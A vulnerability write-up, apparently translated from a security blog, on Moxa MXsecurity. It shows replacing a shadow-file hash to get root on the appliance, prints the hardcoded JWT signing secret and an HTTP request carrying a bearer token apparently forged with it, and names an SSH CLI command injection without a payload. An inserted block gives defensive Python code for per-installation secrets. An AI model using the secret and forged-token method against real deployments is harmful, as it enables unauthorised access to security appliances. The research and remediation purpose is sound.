Moxa MXsecurity hardcoded-credential authentication bypass / SSH pseudo-shell command injection
source link: https://y4er.com/posts/mxsecurity-command-injection-and-hardcoded-credential/
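Download and installation
Logging in over SSH
Logging in as the admin user only gives you a cli program, not bash. You need to mount the vmdk and edit /etc/shadow to change the password of the user1 user.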
user1:$6$xPyopDlu$p3jdHPn3XG8OToD6acaXPBtVQgIvx.fUor0rJEtL0qgLqfPDcPvKlC0eDa77P5afST3Hrg7DFlPQrdqAHSisY1:19188:0:99999:7:::
The password is qwe123!@#
Then log in as user1 and sudo to get root.
The application is started with docker, so just docker cp the files out.
[root@mxsecurity user1]# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
0173ff8b578c nsm-web "python3 -u run.py" 8 minutes ago Up 8 minutes 0.0.0.0:443->443/tcp, :::443->443/tcp nsm-web
eb9dcdd27d4b nsm-receiver "python3 -u run.py" 8 minutes ago Up 8 minutes nsm-receiver
44dc99289cb6 eclipse-mosquitto:1.6-openssl "/docker-entrypoint.…" 8 minutes ago Up 8 minutes 0.0.0.0:1883->1883/tcp, :::1883->1883/tcp, 0.0.0.0:8883->8883/tcp, :::8883->8883/tcp nsm-broker
d2175f582fac cturra/ntp "/bin/sh /opt/startu…" 8 minutes ago Up 8 minutes (healthy) 0.0.0.0:123->123/udp, :::123->123/udp nsm-ntp
[root@mxsecurity user1]# docker cp 0173ff8b578c:/app/ /tmp/
Hardcoded JWT key
APP.config["JWT_SECRET_KEY"] = "MXsecurity secret key"
APP.config["JWT_ACCESS_TOKEN_EXPIRES"] = timedelta(days=1)
APP.config["JWT_TOKEN_LOCATION"] = ["headers", "cookies"]
JWT = JWTManager(APP)
GET /api/v1/system/status HTTP/1.1
Host: 172.16.16.204
Sec-Ch-Ua: "Google Chrome";v="113", "Chromium";v="113", "Not-A.Brand";v="24"
Dnt: 1
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.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.sO6cu-ly2D6e7ZctlVuBcF4CkNmZvbMuwQU7U-xyM2g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
Skiploading: true
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://172.16.16.204/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6
Connection: close
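An added example, not part of the original post and not Moxa's code: one way to replace the hardcoded JWT_SECRET_KEY literal with a secret generated per installation, failing closed if the shipped constant or a loosely permissioned key file is found. The function name and the key-file path are hypothetical, and a POSIX file system is assumed.

```python
import os
import secrets
import stat

# The constant shipped in the application code shown above. Every install
# shares it, so it must never be accepted as a signing key.
KNOWN_SHIPPED_SECRETS = {b"MXsecurity secret key"}
MIN_SECRET_BYTES = 32  # match the HS256 (SHA-256) output size


def load_or_create_jwt_secret(path):
    """Return a per-installation JWT secret, creating it on first start.

    `path` is a hypothetical key-file location chosen for this example.
    """
    try:
        # O_EXCL makes creation atomic: only the first process writes a key.
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    except FileExistsError:
        pass  # key already provisioned, fall through to validation
    else:
        with os.fdopen(fd, "wb") as fh:
            fh.write(secrets.token_bytes(MIN_SECRET_BYTES))

    # Refuse to start if other local users could read the signing key.
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & 0o077:
        raise RuntimeError(f"{path} is accessible to group/other ({oct(mode)})")

    with open(path, "rb") as fh:
        secret = fh.read()

    # Fail closed on the shipped default and on short or truncated keys.
    if secret in KNOWN_SHIPPED_SECRETS or len(secret) < MIN_SECRET_BYTES:
        raise RuntimeError("JWT secret is a shipped default or too short")
    return secret


# In the Flask app, the returned value would take the place of the string
# literal assigned to APP.config["JWT_SECRET_KEY"].
```

Rotating to a fresh secret this way also invalidates every token signed with the old shared key.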
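SSH pseudo-shell command injection
At first I thought this was a command injection in the web interface, but after reading the advisory carefully I found that it is a command injection in the /bin/cli program.
My verdict: it is of very little practical value.
Poor writing, flippant wording, shallow content, clumsy technique. Pointers and corrections from the experts are welcome and much appreciated.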